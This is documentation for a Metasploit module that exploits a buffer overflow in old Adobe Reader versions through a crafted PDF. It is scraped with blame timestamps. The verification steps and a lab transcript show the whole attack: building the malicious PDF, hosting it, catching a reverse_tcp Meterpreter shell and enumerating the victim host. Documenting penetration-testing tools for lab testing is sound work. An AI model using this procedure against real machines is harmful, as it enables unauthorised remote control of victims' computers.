2019-12-06 21:56:48 -07:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
2019-12-12 16:57:38 -05:00
|
|
|
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1.
|
|
|
|
|
By creating a specially crafted pdf that a contains malformed `Collab.getIcon()` call, an attacker may be able to execute arbitrary code.
|
2019-12-06 21:56:48 -07:00
|
|
|
|
2019-12-12 16:57:38 -05:00
|
|
|
Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)
|
2019-12-06 21:56:48 -07:00
|
|
|
|
2019-12-10 13:37:13 -07:00
|
|
|
### Test results (on Windows XP SP3)
|
|
|
|
|
|
2019-12-12 16:57:38 -05:00
|
|
|
* reader 7.0.5 - no trigger
|
|
|
|
|
* reader 7.0.8 - no trigger
|
|
|
|
|
* reader 7.0.9 - no trigger
|
|
|
|
|
* reader 7.1.0 - no trigger
|
|
|
|
|
* reader 7.1.1 - reported not vulnerable
|
|
|
|
|
* reader 8.0.0 - works
|
|
|
|
|
* reader 8.1.2 - works
|
|
|
|
|
* reader 8.1.3 - reported not vulnerable
|
|
|
|
|
* reader 9.0.0 - works
|
|
|
|
|
* reader 9.1.0 - reported not vulnerable
|
2019-12-10 13:37:13 -07:00
|
|
|
|
2019-12-12 16:57:38 -05:00
|
|
|
## Options
|
2019-12-10 13:37:13 -07:00
|
|
|
|
2019-12-12 16:57:38 -05:00
|
|
|
**FILENAME**
|
2019-12-10 13:37:13 -07:00
|
|
|
|
2019-12-12 16:57:38 -05:00
|
|
|
The file name
|
2019-12-10 13:37:13 -07:00
|
|
|
|
2019-12-06 21:56:48 -07:00
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Install application on the target machine
|
|
|
|
|
2. Start msfconsole
|
2019-12-12 16:57:38 -05:00
|
|
|
3. Do: ```use exploit/windows/fileformat/adobe_geticon```
|
|
|
|
|
4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
|
|
|
|
|
5. Do: ```set LHOST [IP]```
|
|
|
|
|
6. Do: ```exploit```
|
|
|
|
|
7. Do: ```use exploit/multi/handler```
|
|
|
|
|
8. Do: ```set LHOST [IP]```
|
|
|
|
|
9. Do: ```exploit```
|
|
|
|
|
10. Do: Open PDF on target machine with vulnerable software
|
2019-12-06 21:56:48 -07:00
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
2019-12-12 16:57:38 -05:00
|
|
|
### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)
|
2019-12-06 21:56:48 -07:00
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf > use exploit/windows/fileformat/adobe_geticon
|
|
|
|
|
msf exploit(windows/fileformat/adobe_geticon) > set FILENAME icon.pdf
|
|
|
|
|
FILENAME => icon.pdf
|
|
|
|
|
msf exploit(windows/fileformat/adobe_geticon) > exploit
|
|
|
|
|
|
|
|
|
|
[*] Creating 'icon.pdf' file...
|
|
|
|
|
[+] icon.pdf stored at /root/.msf4/local/icon.pdf
|
|
|
|
|
msf exploit(windows/fileformat/adobe_geticon) > cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
|
|
|
|
|
[*] exec: cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
|
|
|
|
|
|
|
|
|
|
msf payload(windows/meterpreter/reverse_tcp) > use exploit/multi/handler
|
|
|
|
|
msf exploit(multi/handler) > set LHOST 192.168.1.3
|
|
|
|
|
LHOST => 192.168.1.3
|
|
|
|
|
msf exploit(multi/handler) > exploit
|
|
|
|
|
|
|
|
|
|
[*] Started reverse TCP handler on 192.168.1.3:4444
|
|
|
|
|
[*] Sending stage (180291 bytes) to 192.168.1.5
|
|
|
|
|
[*] Meterpreter session 3 opened (192.168.1.3:4444 -> 192.168.1.5:1160) at 2019-12-06 14:40:10 -0700
|
|
|
|
|
|
|
|
|
|
meterpreter > sysinfo
|
|
|
|
|
Computer : COMPUTER_1
|
|
|
|
|
OS : Windows XP (5.1 Build 2600, Service Pack 3).
|
|
|
|
|
Architecture : x86
|
|
|
|
|
System Language : en_US
|
|
|
|
|
Domain : WORKGROUP
|
|
|
|
|
Logged On Users : 2
|
|
|
|
|
Meterpreter : x86/windows
|
|
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: COMPUTER_1\USER
|
|
|
|
|
meterpreter > run post/windows/gather/enum_applications
|
|
|
|
|
|
|
|
|
|
[*] Enumerating applications installed on COMPUTER_1
|
|
|
|
|
|
|
|
|
|
Installed Applications
|
|
|
|
|
======================
|
|
|
|
|
|
|
|
|
|
Name Version
|
|
|
|
|
---- -------
|
|
|
|
|
Adobe Reader 8 8.0.0
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
[+] Results stored in: /root/.msf4/loot/20191206144654_default_192.168.1.5_host.application_162364.txt
|
|
|
|
|
```
|
